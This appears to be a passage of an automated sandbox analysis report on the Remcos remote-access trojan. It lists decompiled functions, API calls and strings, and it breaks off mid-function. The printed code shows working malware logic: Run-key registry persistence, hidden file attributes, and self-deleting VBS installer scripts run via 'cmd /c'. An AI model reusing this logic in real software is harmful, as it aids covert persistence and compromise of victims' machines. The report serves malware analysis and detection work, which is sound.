								} else {
									E00410F1D(E00401F6B(0x46e5a0), _t122, "WD");
								}
							} while (_t72 == 0);
							goto L17;
						}
						_t55 = E0040243C();
						E00401F6B( &_v32);
						if(E00418911(_t55,  &_v556, _t71) == 0) {
							E004337A0(_t108,  &_v1596, _t71, 0x208);
							_t116 = _t116 + 0xc;
							GetTempPathW(0x104,  &_v1596);
							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
							lstrcatW( &_v1076, L".exe");
							_t68 = E0040243C();
							E00401F6B( &_v32);
							_t70 = E00418911(_t68,  &_v1076, _t71);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L12;
							}
							_t42 =  &_v1076;
							goto L11;
						}
						_t42 =  &_v556;
						goto L11;
						L17:
						_t71 = 0;
						_t112 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t112, 0xffffffff);
						CloseHandle(_t112);
						_t50 = GetCurrentProcessId();
					} while (E00410DEB(0x46e5a0, E00401F6B(0x46e5a0), "WDH", _t50) != 0);
					goto L18;
				}
				L1:
				ExitProcess(_t71);
				goto L2;
			}

0x0040ff58
0x0040ff5a
0x0040ff5e
0x0040ff71
0x0040ff7e
0x0040ff86
0x0040ff97
0x0040ffab
0x0040ffb0
0x0040ffb5
0x0040ffc1
0x0040ffd6
0x00000000
0x00000000
0x0040ffe7
0x0040ffec
0x0040fff3
0x0040fff9
0x00410017
0x0041018e
0x0040ffb8
0x0040ffb8
0x0040ffb8
0x0041001d
0x00410023
0x0041002a
0x00410032
0x00410038
0x004100ee
0x004100f9
0x004100fb
0x00410100
0x00410117
0x0041011b
0x0041011d
0x0041013a
0x0041011f
0x0041012d
0x00410132
0x00410140
0x00000000
0x00410100
0x00410043
0x0041004d
0x0041005f
0x00410079
0x0041007e
0x0041008d
0x004100a7
0x004100b9
0x004100ca
0x004100d4
0x004100dd
0x004100e4
0x004100e6
0x00000000
0x00000000
0x004100e8
0x00000000
0x004100e8
0x00410061
0x00000000
0x00410144
0x00410147
0x00410155
0x0041015a
0x00410161
0x00410167
0x00410186
0x00000000
0x00410023
0x0040ffb7
0x0040ffb8
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0046E600,0046E5A0,00000000), ref: 0040FF5E
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040FF71

Part of subcall function 00410C6B: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046E5A0), ref: 00410C87
Part of subcall function 00410C6B: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410CA0
Part of subcall function 00410C6B: RegCloseKey.ADVAPI32(00000000), ref: 00410CAB

ExitProcess.KERNEL32 ref: 0040FFB8
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040FFE1
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040FFEC
CloseHandle.KERNEL32(00000000), ref: 0040FFF3
GetCurrentProcessId.KERNEL32 ref: 0040FFF9
PathFileExistsW.SHLWAPI(?), ref: 0041002A
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004100F9
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0041014F
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041015A
CloseHandle.KERNEL32(00000000), ref: 00410161
GetCurrentProcessId.KERNEL32 ref: 00410167

Strings

.exe, xrefs: 004100AD
open, xrefs: 004100F3
Mutex_RemWatchdog, xrefs: 0040FF51
exepath, xrefs: 0040FF9D
WDH, xrefs: 00410000, 0041016E
temp_, xrefs: 0041009B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
API String ID: 2645874385-232273909
Opcode ID: 7a62b18b0243725383dd8cf326720b2ffaa034a2e93bfcd0621e031f5383e7ae
Instruction ID: 9c7f7530cc0d229ad88f41e75bda852e4478526989846a7077277ac27e719e20
Opcode Fuzzy Hash: 7a62b18b0243725383dd8cf326720b2ffaa034a2e93bfcd0621e031f5383e7ae
Instruction Fuzzy Hash: 0951C471A003197BDB10A7A19C49EEE336C9B44719F10417BF501A72D2EFBC9EC68A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAE9 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 296
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040AAE9(char __ecx, void* __edx, void* __eflags, WCHAR* _a4, char _a8) {
				char _v0;
				char _v24;
				char _v32;
				void* _v36;
				char _v52;
				char _v56;
				void* _v60;
				char _v80;
				void* _v84;
				char _v96;
				void* _v100;
				char _v104;
				void* _v108;
				char _v120;
				void* _v124;
				char _v128;
				void* _v132;
				char _v144;
				char _v148;
				char _v160;
				char _v168;
				char _v172;
				char _v176;
				void* _v180;
				char _v192;
				char _v193;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t56;
				void* _t57;
				WCHAR* _t62;
				int _t63;
				void* _t72;
				void* _t84;
				void* _t85;
				int _t87;
				void* _t92;
				void* _t93;
				WCHAR* _t106;
				int _t108;
				int _t111;
				WCHAR* _t115;
				int _t116;
				void* _t131;
				void* _t134;
				void* _t238;

				_t134 = __edx;
				_v193 = __ecx;
				_t56 = E00438416(__edx);
				_t246 = _t56;
				if(_t56 == 0) {
					_t237 = _a4;
					_t226 = _v193;
					_t57 = E0041905E( &_v144, _v193, _t237);
					_t238 = 0x46e588;
					E00401ED3(0x46e588, _v193, 0x46e588, _t57);
				} else {
					CreateDirectoryW(E00401EC4(0x46e5b8), 0);
					_t237 = _a4;
					_t226 = E004078F9( &_v192, 0x46e5b8, 0x46e5b8, "\\");
					_t131 = E00402FD4(_t134,  &_v144, _t130, _t237, 0x46e5b8, _t246, _t237);
					_t238 = 0x46e588;
					E00401ED3(0x46e588, _t130, 0x46e588, _t131);
					E00401EC9();
				}
				E00401EC9();
				if(E00438B0D(E00401EC4(_t238), 0x46daf8, _t60) != 0) {
					_t62 = E00401EC4(_t238);
					_t243 = CopyFileW;
					_t63 = CopyFileW(0x46daf8, _t62, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						L12:
						_push(E00401EC4(0x46e570));
						E0040A9F7(0x46e570);
						__eflags = _a8 - 1;
						_pop(0x46e5b8);
						if(__eflags == 0) {
							_t106 = E00401EC4(_t238);
							_t237 = SetFileAttributesW;
							SetFileAttributesW(_t106, 7);
							_t108 = E00438416(_t134);
							_pop(0x46e5b8);
							__eflags = _t108;
							if(__eflags != 0) {
								SetFileAttributesW(E00401EC4(0x46e5b8), 7);
							}
						}
						_t227 = E0040413E(_t134,  &_v168, _t226, _t243, E00438A0F(_t134, 0x46e5b8, __eflags, L"Temp"));
						E00402FD4(_t134,  &_v148, _t67, _t237, _t243, __eflags, L"\\install.vbs");
						E00401EC9();
						E0040413E(_t134,  &_v196, _t67, _t243, L"WScript.Sleep 1000\n");
						L00407735(_t134,  &_v200, _t237, _t243, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
						__eflags = _v0 - 1;
						_t135 = "\n";
						if(__eflags == 0) {
							_t237 = "\"";
							_t93 = E0040413E("\n",  &_v24, _t227, _t243, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe");
							_t227 = E00402FD4(_t135,  &_v128, E00402F65( &_v104, E00402FD4(_t135,  &_v80, E0040413E(_t135,  &_v52, _t227, _t243, L"fso.DeleteFile "), "\"", _t243, __eflags, _t237), _t93), _t237, _t243, __eflags, "\"");
							E0040321D(E00402FD4(_t135,  &_v176, _t97, _t237, _t243, __eflags, _t135));
							E00401EC9();
							E00401EC9();
							E00401EC9();
							E00401EC9();
							E00401EC9();
							E00401EC9();
						}
						_t72 = E0040413E(_t135,  &_v120, _t227, _t243, L"\"\"\", 0");
						E0040321D(E00402FD4(_t135,  &_v32, E00402F65( &_v56, E004042DD(_t135,  &_v80, E0040413E(_t135,  &_v172, _t227, _t243, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t243, __eflags, _t238), _t72), _t237, _t243, __eflags, _t135));
						E00401EC9();
						E00401EC9();
						E00401EC9();
						E00401EC9();
						E00401EC9();
						L00407735(_t135,  &_v204, _t237, _t243, L"fso.DeleteFile(Wscript.ScriptFullName)");
						_t84 = E00401EC4( &_v160);
						_t85 = E0040243C();
						E00401EC4( &_v208);
						_t87 = E00418911(_t85 + _t85, _t84, 0);
						__eflags = _t87;
						if(_t87 == 0) {
							L20:
							E00401EC9();
							return E00401EC9();
						} else {
							_t92 = ShellExecuteW(0, L"open", E00401EC4( &_v144), 0x4610ec, 0x4610ec, 0);
							__eflags = _t92 - 0x20;
							if(_t92 <= 0x20) {
								goto L20;
							}
							ExitProcess(0);
						}
					}
					__eflags = _v193 - 0x36;
					if(_v193 == 0x36) {
						goto L12;
					}
					_t111 = E00438416(_t134);
					_t226 = 0x36;
					_push(_t237);
					__eflags = _t111;
					if(_t111 == 0) {
						E00401ED3(_t238, 0x36, _t238, E0041905E( &_v168, 0x36));
					} else {
						_t226 = E00402FD4(_t134,  &_v120, E0041905E( &_v168, 0x36, _t134), _t237, CopyFileW, __eflags, "\\");
						E00401ED3(_t238, _t120, _t238, E00402FD4(_t134,  &_v96, _t120, _t237, CopyFileW, __eflags));
						E00401EC9();
						E00401EC9();
					}
					E00401EC9();
					_t115 = E00401EC4(_t238);
					_t237 = 0x46daf8;
					_t116 = CopyFileW(0x46daf8, _t115, 0);
					__eflags = _t116;
					if(_t116 != 0) {
						goto L12;
					} else {
						L00409F8A(_t134, _t238, _t226, 0x46daf8);
						return 0;
					}
				} else {
					_push(E00401EC4(0x46e570));
					E0040A9F7(0x46e570);
					return 1;
				}
			}

0x0040aaf2
0x0040aaf4
0x0040aafa
0x0040ab05
0x0040ab07
0x0040ab5a
0x0040ab65
0x0040ab6a
0x0040ab70
0x0040ab78
0x0040ab09
0x0040ab13
0x0040ab19
0x0040ab32
0x0040ab38
0x0040ab3e
0x0040ab46
0x0040ab4f
0x0040ab54
0x0040ab81
0x0040ab9d
0x0040abbd
0x0040abc4
0x0040abca
0x0040abcc
0x0040abce
0x0040ac6d
0x0040ac77
0x0040ac79
0x0040ac7e
0x0040ac87
0x0040ac88
0x0040ac8e
0x0040ac93
0x0040ac9a
0x0040ac9d
0x0040aca2
0x0040aca3
0x0040aca5
0x0040acb4
0x0040acb4
0x0040aca5
0x0040acd0
0x0040acd6
0x0040ace0
0x0040acee
0x0040acfc
0x0040ad01
0x0040ad09
0x0040ad0e
0x0040ad15
0x0040ad27
0x0040ad69
0x0040ad7a
0x0040ad83
0x0040ad8c
0x0040ad95
0x0040ada1
0x0040adad
0x0040adb9
0x0040adb9
0x0040adc8
0x0040ae0f
0x0040ae1b
0x0040ae27
0x0040ae33
0x0040ae3c
0x0040ae45
0x0040ae53
0x0040ae5f
0x0040ae69
0x0040ae76
0x0040ae7f
0x0040ae86
0x0040ae88
0x0040aeb4
0x0040aeb8
0x00000000
0x0040ae8a
0x0040aea2
0x0040aea8
0x0040aeab
0x00000000
0x00000000
0x0040aeae
0x0040aeae
0x0040ae88
0x0040abd4
0x0040abd9
0x00000000
0x00000000
0x0040abe0
0x0040abe5
0x0040abec
0x0040abed
0x0040abef
0x0040ac3a
0x0040abf1
0x0040ac09
0x0040ac18
0x0040ac21
0x0040ac2a
0x0040ac2a
0x0040ac43
0x0040ac4c
0x0040ac52
0x0040ac58
0x0040ac5a
0x0040ac5c
0x00000000
0x0040ac5e
0x0040ac61
0x00000000
0x0040ac66
0x0040ab9f
0x0040aba9
0x0040abab
0x00000000
0x0040abb2

APIs

_wcslen.LIBCMT ref: 0040AAFA
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0046E600,?,00000000), ref: 0040AB13
CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe,00000000,00000000,00000000,00000000,0046E600,?,00000000), ref: 0040ABCA
_wcslen.LIBCMT ref: 0040ABE0
CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe,00000000,00000000,00000000), ref: 0040AC58
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AC9A
_wcslen.LIBCMT ref: 0040AC9D
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040ACB4
ShellExecuteW.SHELL32(00000000,open,00000000,004610EC,004610EC,00000000), ref: 0040AEA2
ExitProcess.KERNEL32 ref: 0040AEAE

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, xrefs: 0040AB8E, 0040AB93, 0040ABC3, 0040AC52, 0040AC57, 0040AC5E, 0040AD22
\install.vbs, xrefs: 0040ACB6
Temp, xrefs: 0040ACBB
WScript.Sleep 1000, xrefs: 0040ACE5
open, xrefs: 0040AE9C
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040ADCF
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040AE4A
6, xrefs: 0040ABD4
Remcos, xrefs: 0040AB9F, 0040AC6D
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040ACF3
fso.DeleteFile , xrefs: 0040AD2E
""", 0, xrefs: 0040ADBF

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
String ID: """, 0$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
API String ID: 2743683619-4264382174
Opcode ID: 2879f92fe03c27c592680b251b994213c7d2a24ebb03d226a4e0e84e18f3e819
Instruction ID: cdb898408122807b9306d3bdb2b1774f24414caa006db9133b5e780cf41d0cef
Opcode Fuzzy Hash: 2879f92fe03c27c592680b251b994213c7d2a24ebb03d226a4e0e84e18f3e819
Instruction Fuzzy Hash: 499170716183416AD218F722DC62EAF73E99F90349F10443FF446661E2EE3C994AC69F

Uniqueness

Uniqueness Score: -1.00%

Function 0040AED1 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 259
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040AED1() {
				short _v524;
				char _v548;
				char _v572;
				char _v576;
				char _v596;
				char _v600;
				void* _v604;
				char _v620;
				char _v624;
				void* _v628;
				char _v644;
				char _v648;
				char _v652;
				char _v668;
				char _v672;
				void* _v676;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t71;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				void* _t195;
				void* _t228;
				void* _t230;
				void* _t231;
				void* _t232;

				E0041030A();
				if( *0x46c9c4 != 0x30) {
					E00409F34();
				}
				_t228 =  *0x46dd5b - 1; // 0x0
				if(_t228 == 0) {
					E0041628E(_t195, _t228);
				}
				if( *0x46da75 != 0) {
					E004187B1(E00401EC4(0x46e0d8), _t195);
				}
				_t213 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t230 =  *0x46daf7 - 1; // 0x1
				if(_t230 == 0) {
					E00410F97(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EC4(0x46e570));
				}
				_t231 =  *0x46daf4 - 1; // 0x0
				if(_t231 == 0) {
					E00410F97(0x80000002, _t213, E00401EC4(0x46e570));
				}
				_t232 =  *0x46daf5 - 1; // 0x0
				if(_t232 == 0) {
					E00410F97(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EC4(0x46e570));
				}
				E004337A0(0,  &_v524, 0, 0x208);
				_t49 = E0040243C();
				_t50 = E00401F6B(0x46e5e8);
				_t53 = E00410C6B(E00401F6B(0x46e5a0), "exepath",  &_v524, 0x208, _t50, _t49);
				_t233 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v524, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F6B(0x46e5a0));
				_t56 = E004078C9(_t233);
				_t234 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(E00401EC4(0x46e5b8), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v524, 0x80));
				asm("sbb bl, bl");
				E00402FD4(_t123,  &_v548, E00418385( &_v620, E00418114( &_v668)), 0, 0x4610ec, _t234, L".vbs");
				E00401EC9();
				E00401F98();
				E004042DD(_t123,  &_v576, E00402FD4(_t123,  &_v672, E0040413E(_t123,  &_v620, _t60, 0x4610ec, E00438A0F(_t123,  &_v668, _t234, L"Temp")), 0, 0x4610ec, _t234, "\\"), 0x4610ec, _t234,  &_v548);
				E00401EC9();
				E00401EC9();
				_t71 = E0040413E(_t123,  &_v672, _t67, 0x4610ec, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
				_t202 = L"On Error Resume Next\n";
				E004042BC(_t123,  &_v652, L"On Error Resume Next\n", 0x4610ec, _t234, _t71);
				E00401EC9();
				_t124 = _t123 & 0x00000001;
				_t235 = _t124;
				if(_t124 != 0) {
					_t202 = E004042BC(_t124,  &_v624, L"while fso.FileExists(\"", 0x4610ec, _t235, E0040413E(_t124,  &_v596, L"On Error Resume Next\n", 0x4610ec,  &_v524));
					E0040321D(E00402FD4(_t124,  &_v672, _t98, 0, 0x4610ec, _t235, L"\")\n"));
					E00401EC9();
					E00401EC9();
					E00401EC9();
				}
				E0040321D(E00402FD4(_t124,  &_v600, E00402FD4(_t124,  &_v672, E0040413E(_t124,  &_v620, _t202, 0x4610ec, L"fso.DeleteFile \""), 0, 0x4610ec, _t235,  &_v524), 0, 0x4610ec, _t235, L"\"\n"));
				E00401EC9();
				E00401EC9();
				E00401EC9();
				_t236 = _t124;
				if(_t124 != 0) {
					L00407735(_t124,  &_v644, 0, 0x4610ec, L"wend\n");
				}
				_t82 = E004078C9(_t236);
				_t237 = _t82;
				if(_t82 != 0) {
					E0040321D(E00402FD4(_t124,  &_v596, E0040A01F( &_v668, L"fso.DeleteFolder \"", 0x4610ec, 0x46e5b8), 0, 0x4610ec, _t237, L"\"\n"));
					E00401EC9();
					E00401EC9();
				}
				L00407735(_t124,  &_v644, 0, 0x4610ec, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = E00401EC4( &_v576);
				_t85 = E0040243C();
				E00401EC4( &_v648);
				if(E00418911(_t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", E00401EC4( &_v572), 0x4610ec, 0x4610ec, 0);
				}
				ExitProcess(0);
			}

0x0040aedb
0x0040aee7
0x0040aee9
0x0040aee9
0x0040aef1
0x0040aef7
0x0040aef9
0x0040aef9
0x0040af05
0x0040af13
0x0040af13
0x0040af1d
0x0040af22
0x0040af28
0x0040af39
0x0040af3e
0x0040af44
0x0040af4a
0x0040af58
0x0040af5d
0x0040af5e
0x0040af64
0x0040af75
0x0040af7a
0x0040af8c
0x0040af9b
0x0040afa3
0x0040afc5
0x0040afcd
0x0040afcf
0x0040afdb
0x0040afdb
0x0040afee
0x0040b002
0x0040b00d
0x0040b00f
0x0040b01e
0x0040b01e
0x0040b035
0x0040b03c
0x0040b057
0x0040b061
0x0040b06a
0x0040b0a3
0x0040b0ad
0x0040b0b6
0x0040b0c4
0x0040b0ca
0x0040b0d3
0x0040b0dd
0x0040b0e2
0x0040b0e2
0x0040b0e5
0x0040b10d
0x0040b11e
0x0040b127
0x0040b130
0x0040b139
0x0040b139
0x0040b176
0x0040b17f
0x0040b188
0x0040b191
0x0040b196
0x0040b198
0x0040b1a3
0x0040b1a3
0x0040b1b1
0x0040b1b6
0x0040b1b8
0x0040b1e0
0x0040b1e9
0x0040b1f2
0x0040b1f2
0x0040b200
0x0040b20a
0x0040b214
0x0040b221
0x0040b233
0x0040b248
0x0040b248
0x0040b24f

APIs

Part of subcall function 0041030A: TerminateProcess.KERNEL32(00000000,0046E588,0040D393), ref: 0041031A
Part of subcall function 0041030A: WaitForSingleObject.KERNEL32(000000FF), ref: 0041032D

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,0046E5A0,pth_unenc,0046E588), ref: 0040AFDB
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040AFEE
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,0046E5A0,pth_unenc,0046E588), ref: 0040B01E
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,0046E5A0,pth_unenc,0046E588), ref: 0040B02D

Part of subcall function 00409F34: TerminateThread.KERNEL32(Function_00008A37,00000000,0046E588,0040AEEE,?,0046E5A0,pth_unenc,0046E588), ref: 00409F43
Part of subcall function 00409F34: UnhookWindowsHookEx.USER32(0025013B), ref: 00409F53
Part of subcall function 00409F34: TerminateThread.KERNEL32(Function_00008A21,00000000,?,0046E5A0,pth_unenc,0046E588), ref: 00409F65

Part of subcall function 00418114: GetCurrentProcessId.KERNEL32(00000000,76F1FBB0,00000000,?,?,?,?,004610EC,0040B043,.vbs,?,?,?,?,?,0046E5A0), ref: 0041813B

ShellExecuteW.SHELL32(00000000,open,00000000,004610EC,004610EC,00000000), ref: 0040B248
ExitProcess.KERNEL32 ref: 0040B24F

Strings

fso.DeleteFolder ", xrefs: 0040B1C0
open, xrefs: 0040B242
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B1F7
while fso.FileExists(", xrefs: 0040B0FE
"), xrefs: 0040B0E7
On Error Resume Next, xrefs: 0040B0CA
pth_unenc, xrefs: 0040AED8
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040AF6E
wend, xrefs: 0040B19A
Temp, xrefs: 0040B07C
.vbs, xrefs: 0040B037
fso.DeleteFile ", xrefs: 0040B14B
Remcos, xrefs: 0040AF18
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040AF1D
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040B0BB
exepath, xrefs: 0040AFB7

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2576244540
Opcode ID: 4c64382ddb97d8ff81256f1915caf1e90f7033956b8d0fe56b616e5b14eca6c0
Instruction ID: 801c7e5999a756b5f7540a02e4d46a31ed507c5808ea6cb679f541176d1c9f0b
Opcode Fuzzy Hash: 4c64382ddb97d8ff81256f1915caf1e90f7033956b8d0fe56b616e5b14eca6c0
Instruction Fuzzy Hash: CA817F716183405AC718FB22DC629AF73A99B90709F14443FF442A71E2FE7C9D4AC69E

Uniqueness

Uniqueness Score: -1.00%

Function 00401A2D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00401A2D(WCHAR* __ecx, signed int __edx) {
				void _v4;
				void _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				long _v28;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x46da9a & 0x0000ffff;
				_t83 = ( *0x46daa6 & 0x0000ffff) * _t80;
				_v16 = 1;
				_v20 = 0x10;
				_v12 = _t83 *  *0x46da9c >> 3;
				asm("cdq");
				_v8 = _t83 + (__edx & 0x00000007) >> 3;
				_t5 =  &(_t75[1]); // 0x0
				_t36 =  *_t5 * _t80;
				_v4 = _t36;
				_v24 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					_push(0);
					WriteFile(_t81, "RIFF", 0, 4,  &_v28);
					WriteFile(_t81,  &_v24, 0,  &_v28, 0);
					WriteFile(_t81, "WAVE", 0,  &_v28, 0);
					WriteFile(_t81, "fmt ", 0,  &_v28, 0);
					WriteFile(_t81,  &_v20, 0,  &_v28, 0);
					WriteFile(_t81,  &_v16, 2,  &_v28, 0);
					WriteFile(_t81, 0x46da9a, 2,  &_v28, 0);
					WriteFile(_t81, 0x46da9c, 0,  &_v28, 0);
					WriteFile(_t81,  &_v12, 0,  &_v28, 0);
					WriteFile(_t81,  &_v8, 2,  &_v28, 0);
					WriteFile(_t81, 0x46daa6, 2,  &_v28, 0);
					WriteFile(_t81, "data", 0,  &_v28, 0);
					WriteFile(_t81,  &_v4, 0,  &_v28, 0);
					_t28 =  &(_t75[1]); // 0x0
					WriteFile(_t81,  *_t75,  *_t28,  &_v28, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}

0x00401a3a
0x00401a3d
0x00401a46
0x00401a54
0x00401a6a
0x00401a75
0x00401a7b
0x00401a84
0x00401a88
0x00401a8b
0x00401a8e
0x00401a95
0x00401a9f
0x00401aa4
0x00401ab7
0x00401ac3
0x00401ad3
0x00401ae3
0x00401af3
0x00401b03
0x00401b14
0x00401b25
0x00401b35
0x00401b45
0x00401b56
0x00401b67
0x00401b77
0x00401b87
0x00401b90
0x00401b96
0x00401b99
0x00000000
0x00401b9f
0x00000000

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401A99
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AC3
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AD3
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401AE3
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401AF3
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B14
WriteFile.KERNEL32(00000000,0046DA9A,00000002,00000000,00000000), ref: 00401B25
WriteFile.KERNEL32(00000000,0046DA9C,00000004,00000000,00000000), ref: 00401B35
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B45
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B56
WriteFile.KERNEL32(00000000,0046DAA6,00000002,00000000,00000000), ref: 00401B67
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B77
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B87

Strings

RIFF, xrefs: 00401ABD
fmt , xrefs: 00401AED
data, xrefs: 00401B71
WAVE, xrefs: 00401ADD

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: a705cae664cf4fbeb000453d8aee87cfebac97f8560e5cf804a01f08f43cd4ab
Instruction ID: 3f40b1f8be9e92d4fbbdd685f5502258d59ba1ee4827fe56c80a4f4cfc1e7d52
Opcode Fuzzy Hash: a705cae664cf4fbeb000453d8aee87cfebac97f8560e5cf804a01f08f43cd4ab
Instruction Fuzzy Hash: BB416072A583187EE210DA91DC85FBB7EECEB85B50F40051AF644DA080E7A4E905DBB3

Uniqueness

Uniqueness Score: -1.00%

Function 0044B19E Relevance: 25.9, APIs: 17, Instructions: 419
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0044B19E(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
